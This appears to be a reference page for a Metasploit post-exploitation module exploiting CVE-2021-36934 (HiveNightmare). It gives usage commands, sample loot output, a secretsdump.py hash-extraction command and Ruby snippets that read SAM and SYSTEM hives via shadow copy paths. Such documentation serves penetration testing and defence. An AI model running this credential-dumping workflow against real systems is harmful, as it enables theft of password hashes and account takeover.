Windows SAM secrets leak - HiveNightmare - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/windows_sam_hivenightmare metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Source code: modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
Disclosure date: 2021-07-20
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-36934

This module is also known as HiveNightmare or SeriousSAM.

Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged user to read those files. But, as they are locked while Windows is running we are not able to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally enabled, to finally have a read access. Once SAM and SYSTEM files are successfully dumped and stored in store_loot, you can dump the hashes with some external scripts like secretsdump.py

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/windows_sam_hivenightmare

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/windows_sam_hivenightmare
msf post(windows_sam_hivenightmare) > show options
    ... show and set options ...
msf post(windows_sam_hivenightmare) > set SESSION session-id
msf post(windows_sam_hivenightmare) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/windows_sam_hivenightmare")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

Description

Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged user to read those files. But, as they are locked while Windows is running we are not able to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally enabled, to finally have a read access. Once SAM and SYSTEM files are successfully dumped and stored in store_loot, you can dump the hashes with some external scripts like secretsdump.py

Installation

VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below:

  • Open the control panel
  • Navigate to System and Security > System
  • Select System Protection from the column on the left
  • See in Protection Settings list if t drive protection is enabled
  • Optionally, select Create to "Create a resptore point right now..."
    • This is necessary if the module can not find an existing Shadow Copy file which can be the case if the Windows instance is brand new

Be aware that you will need Administrator privileges to follow those steps. You can read more here.

Verification Steps

  1. Start msfconsole
  2. use post/windows/gather/credentials/windows_sam_hivenightmare
  3. set ITERATIONS <number> to specify the number of iterations on file index (default is 10)
  4. set FILE_INDEX <number> optionally if you want to target a specific file index instead of iterating on all indexes in a range
  5. run the module to exploit the vulnerability and potentially leak SAM and SYSTEM files

Options

ITERATIONS

Set ITERATIONS to specify the number of iterations on Shadow Copy file index. Windows is saving those files under the volume name HarddiskVolumeShadowCopy<index>. By default, this module is bruteforcing that index value by trying all values between 0 and 10, which you can change if needed.

FILE_INDEX

Set FILE_INDEX if you want to target a specific index instead of the default behaviour which bruteforces all indexes in a given range.

Scenarios

This module was successfully tested on Windows 10 20H2. See the following output:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run

[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin

/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >

Then, you can dump the hashes from leaked files with secretsdump.py for instance: python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL

Go back to menu.

Msfconsole Usage

Here is how the windows/gather/credentials/windows_sam_hivenightmare post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/windows_sam_hivenightmare

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show info

       Name: Windows SAM secrets leak - HiveNightmare
     Module: post/windows/gather/credentials/windows_sam_hivenightmare
   Platform: Windows
       Arch: 
       Rank: Normal
  Disclosed: 2021-07-20

Provided by:
  Kevin Beaumont
  romarroca
  Yann Castel (yann.castel <Yann Castel ([email protected])>

Module stability:
 crash-safe

Compatible session types:
  Meterpreter

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  FILE_INDEX                   no        Optional index parameter to retrieve a specific Shadow Copy file
  ITERATIONS  10               yes       Number of iterations on Shadow Copy file index
  SESSION                      yes       The session to run this module on.

Description:
  Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is 
  possible for an unprivileged user to read those files. But, as they 
  are locked while Windows is running we are not able to read them 
  directly. The trick is to take advantage of Volume Shadow Copy, 
  which is generally enabled, to finally have a read access. Once SAM 
  and SYSTEM files are successfully dumped and stored in `store_loot`, 
  you can dump the hashes with some external scripts like 
  secretsdump.py

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-36934
  https://github.com/GossiTheDog/HiveNightmare
  https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
  https://github.com/romarroca/SeriousSam

Also known as:
  HiveNightmare
  SeriousSAM

Module Options

This is a complete list of options available in the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show options

Module options (post/windows/gather/credentials/windows_sam_hivenightmare):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILE_INDEX                   no        Optional index parameter to retrieve a specific Shadow Copy file
   ITERATIONS  10               yes       Number of iterations on Shadow Copy file index
   SESSION                      yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show advanced

Module advanced options (post/windows/gather/credentials/windows_sam_hivenightmare):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/gather/credentials/windows_sam_hivenightmare module can do:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

GetLastError

Here is a relevant code snippet related to the "GetLastError" error message:

46:	    ])
47:	  end
48:	
49:	  def check_path(path)
50:	    r = session.railgun.kernel32.CreateFileA(path, 'GENERIC_READ', 0x3, nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_NORMAL', nil)
51:	    if r['GetLastError'] == 0
52:	      return r['return']
53:	    end
54:	
55:	    nil
56:	  end

Can't open SYSTEM file!

Here is a relevant code snippet related to the "Can't open SYSTEM file!" error message:

77:	      read_file(sam_handle)
78:	    )
79:	    print_good("SAM data saved at #{path}")
80:	
81:	    handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{index}\\Windows\\System32\\config\\SYSTEM")
82:	    fail_with(Failure::UnexpectedReply, "Can't open SYSTEM file!") unless handle
83:	    path = store_loot(
84:	      'windows.system',
85:	      '',
86:	      session,
87:	      read_file(handle)

Please specify a non-negative file index!

Here is a relevant code snippet related to the "Please specify a non-negative file index!" error message:

90:	    print_good('SAM and SYSTEM data were leaked!')
91:	  end
92:	
93:	  def run
94:	    if datastore['FILE_INDEX']
95:	      fail_with(Failure::BadConfig, 'Please specify a non-negative file index!') unless datastore['FILE_INDEX'] >= 0
96:	
97:	      handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{datastore['FILE_INDEX']}\\Windows\\System32\\config\\SAM")
98:	      if handle
99:	        print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100:	        print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")

Please specify an iteration number greater than 0!

Here is a relevant code snippet related to the "Please specify an iteration number greater than 0!" error message:

99:	        print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100:	        print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
101:	        loot_files(handle, datastore['FILE_INDEX'])
102:	      end
103:	    else
104:	      fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0
105:	
106:	      most_recent_time = nil
107:	      most_recent_shadow_copy = nil
108:	      index_most_recent_shadow_copy = -1
109:

No Shadow Copy files were found! Maybe you can try again with a greater iteration number...

Here is a relevant code snippet related to the "No Shadow Copy files were found! Maybe you can try again with a greater iteration number..." error message:

127:	      end
128:	
129:	      if index_most_recent_shadow_copy != -1
130:	        print_good("Retrieving files of index #{index_most_recent_shadow_copy} as they are the most recently modified...")
131:	        loot_files(most_recent_shadow_copy, index_most_recent_shadow_copy)
132:	      else
133:	        print_error('No Shadow Copy files were found! Maybe you can try again with a greater iteration number...')
134:	      end
135:	    end
136:	  end
137:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Kevin Beaumont
  • romarroca
  • Yann Castel (yann.castel[at]orange.com)

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.